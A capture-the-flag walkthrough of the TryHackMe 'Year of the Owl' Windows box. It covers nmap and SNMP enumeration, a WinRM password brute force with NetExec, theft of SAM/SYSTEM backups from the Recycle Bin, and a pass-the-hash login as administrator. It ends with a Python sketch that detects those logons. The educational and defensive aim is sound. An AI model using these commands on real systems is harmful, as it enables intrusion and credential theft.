#tryhackme #windows #hard
![[Pasted image 20250708000101.png]]
---
# Information Gathering - Nmap
As always, I began by scanning all 65,535 TCP ports and found 5 open ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 21:56 CDT
Nmap scan report for 10.10.235.117
Host is up (0.14s latency).
Not shown: 65527 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
Nmap done: 1 IP address (1 host up) scanned in 44.09 seconds
```
Then I ran a more detailed TCP port scan against those 5 open ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 80,139,443,445,3306,3389,5985,47001
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 21:58 CDT
Nmap scan report for 10.10.235.117
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
|_http-title: Year of the Owl
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=year-of-the-owl
| Not valid before: 2025-07-07T02:53:34
|_Not valid after: 2026-01-06T02:53:34
|_ssl-date: 2025-07-08T02:59:21+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: YEAR-OF-THE-OWL
| NetBIOS_Domain_Name: YEAR-OF-THE-OWL
| NetBIOS_Computer_Name: YEAR-OF-THE-OWL
| DNS_Domain_Name: year-of-the-owl
| DNS_Computer_Name: year-of-the-owl
| Product_Version: 10.0.17763
|_ System_Time: 2025-07-08T02:58:43+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-07-08T02:58:47
|_ start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.31 seconds
```
A UDP scan of the top 1,000 ports revealed no open ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 22:00 CDT
Nmap scan report for 10.10.235.117
Host is up (0.13s latency).
All 1000 scanned ports on 10.10.235.117 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 1.84 seconds
```
---
# Footprinting
##### PORT 445 - SMB
I tried a null session (`-N`) with `smbclient` to see whether the SMB server could be enumerated without credentials, but access was denied.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -N -L //$IP
session setup failed: NT_STATUS_ACCESS_DENIED
```
##### PORT 80 - HTTP
The landing page of port 80 displays an image of an owl.
![[Pasted image 20250707220140.png]]
At this point, I tried `gobuster` and other directory-busting tools to enumerate directories and pages, but found no leads. That's when I tried scanning UDP ports one more time.
Oddly enough, scanning the top 1,000 UDP ports revealed no open ports, but scanning just the top 10 showed all 10 as `open|filtered`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 22:17 CDT
Nmap scan report for 10.10.235.117
Host is up (0.14s latency).
All 1000 scanned ports on 10.10.235.117 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 22:17 CDT
Nmap scan report for 10.10.235.117
Host is up (0.15s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
445/udp open|filtered microsoft-ds
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds
```
##### Port 161 - SNMP
Looking at the Nmap results, one non-default service stands out: `SNMP` on UDP 161. I tried to enumerate version information with Nmap's `-sCV` options, but that failed.
That's okay. Using `onesixtyone`, I was able to enumerate the SNMP community string `openview`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt $IP
Scanning 1 hosts, 3219 communities
10.10.235.117 [openview] Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
```
Once I had the SNMP community string `openview`, I ran `snmp-check` with it to dump all available SNMP information.
![[Pasted image 20250707223858.png]]
Looking through the results, under `User accounts`, we find a username that stands out because it is not a default account.
![[Pasted image 20250707224236.png]]
# Exploit - Initial Access
##### Port 5985 - WinRM
With a username in hand and port 5985 open, we can try brute-forcing the password of `Jareth` against WinRM using `NetExec`:
```bash
nxc winrm $IP -u Jareth -p /usr/share/wordlists/rockyou.txt | grep 'Pwn3d'
```
NetExec found the password for user `Jareth`!
![[Pasted image 20250707230217.png]]
Since we now have a valid set of credentials, let's log in to WinRM via `evil-winrm`... and I successfully logged in :)
![[Pasted image 20250707230433.png]]
Found `user.txt` in `C:\Users\Jareth\Desktop`
![[Pasted image 20250707230616.png]]
# Privilege Escalation
I am going to use `winPEAS` to enumerate privilege escalation vectors. First, I transferred `winPEAS` from my local Kali machine to the remote Windows system.
![[Pasted image 20250707231433.png]]
At this point, I was stuck for a very long time. I ran `winPEAS` but couldn't identify any attack vectors, so I tried manual methods one by one. Then I thought to look inside the Recycle Bin, and there were `sam` and `system` backup files inside...
```powershell
*Evil-WinRM* PS C:\Users\Jareth\Documents> whoami /user
USER INFORMATION
----------------
User Name SID
====================== =============================================
year-of-the-owl\jareth S-1-5-21-1987495829-1628902820-919763334-1001
```
```powershell
*Evil-WinRM* PS C:\Users\Jareth\Documents> dir 'C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001'
Directory: C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 7:28 PM 49152 sam.bak
-a---- 9/18/2020 7:28 PM 17457152 system.bak
```
In order to download these files to my local Kali machine, I first need to move them out of the Recycle Bin.
```powershell
*Evil-WinRM* PS C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001> move sam.bak C:\Users\Jareth\Documents\sam.bak
*Evil-WinRM* PS C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001> move system.bak C:\Users\Jareth\Documents\system.bak
```
Then I downloaded them using `Evil-WinRM`'s built-in `download` command.
```powershell
Directory: C:\Users\Jareth\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 7:28 PM 49152 sam.bak
-a---- 9/18/2020 7:28 PM 17457152 system.bak
*Evil-WinRM* PS C:\Users\Jareth\Documents> download sam.bak
*Evil-WinRM* PS C:\Users\Jareth\Documents> download system.bak
```
From here we can extract the stored user hashes from the two hives using Impacket's `secretsdump.py`.
![[Pasted image 20250707234321.png]]
We could try cracking the NTLM hashes, but there is no need: we can carry out a `Pass-the-Hash` attack by passing the NT hash as a parameter to `evil-winrm`. This successfully logged me in as `administrator`.
![[Pasted image 20250707235911.png]]
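Both footholds in this box leave distinct traces in the Windows Security log: the WinRM brute force shows up as a burst of 4625 failures for one account from one source, and the Pass-the-Hash login as a 4624 network logon (LogonType 3) authenticated with NTLM as the RID-500 built-in Administrator. The detection logic below is an added example written for this writeup, not tooling from the room or its author; the `EVENTS` list is constructed sample data and the event field names are simplified stand-ins for the real `TargetUserName`, `IpAddress`, `LogonType` and `AuthenticationPackageName` fields.

```python
"""Detection sketch for two traces this intrusion leaves in the Windows Security
log: the WinRM brute force (a burst of 4625 failures for one account from one
source) and the Pass-the-Hash logon (4624, LogonType 3, NTLM, as RID 500).
Added example, not from the writeup; EVENTS is constructed sample data."""
from collections import defaultdict
from datetime import datetime, timedelta

def ev(t, eid, user, src, pkg="NTLM", sid="", ltype=3):
    """Minimal stand-in for the fields of a 4624/4625 event."""
    return {"ts": t, "id": eid, "user": user, "src": src,
            "pkg": pkg, "sid": sid, "type": ltype}

T0 = datetime(2025, 7, 7, 23, 1, 0)
EVENTS = [ev(T0 + timedelta(seconds=5 * i), 4625, "Jareth", "10.9.1.5")
          for i in range(12)]                            # spray from one host
EVENTS += [
    ev(T0 + timedelta(minutes=1, seconds=5), 4624, "Jareth", "10.9.1.5",
       sid="S-1-5-21-111-222-333-1001"),                 # a guess succeeded
    ev(T0 + timedelta(minutes=3), 4625, "svc_backup", "10.9.1.77"),  # lone typo
    ev(T0 + timedelta(minutes=4), 4624, "Administrator", "10.9.1.8",
       pkg="Kerberos", sid="S-1-5-21-111-222-333-500"),  # Kerberos, not NTLM
    ev(T0 + timedelta(minutes=45), 4624, "Administrator", "10.9.1.5",
       sid="S-1-5-21-111-222-333-500"),                  # NTLM logon as RID 500
]

def failed_logon_bursts(events, threshold=10, window=timedelta(minutes=2)):
    """(user, src) pairs with >= threshold network-logon failures in `window`."""
    fails = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e["type"] == 3:
            fails[(e["user"], e["src"])].append(e["ts"])
    hits = set()
    for key, times in fails.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):          # sliding window over timestamps
            while t - times[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                hits.add(key)
                break
    return hits

def rid500_ntlm_network_logons(events):
    """Sources that completed an NTLM network logon as the RID-500 account;
    Kerberos logons and non-admin accounts are ignored."""
    return {e["src"] for e in events
            if e["id"] == 4624 and e["type"] == 3
            and e["pkg"] == "NTLM" and e["sid"].endswith("-500")}
```

The RID-500 check matches on the SID suffix rather than the name, so a renamed built-in Administrator is still caught; a lone failed logon and a Kerberos admin logon from another host both pass through without an alert.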
Found `admin.txt`
![[Pasted image 20250708000008.png]]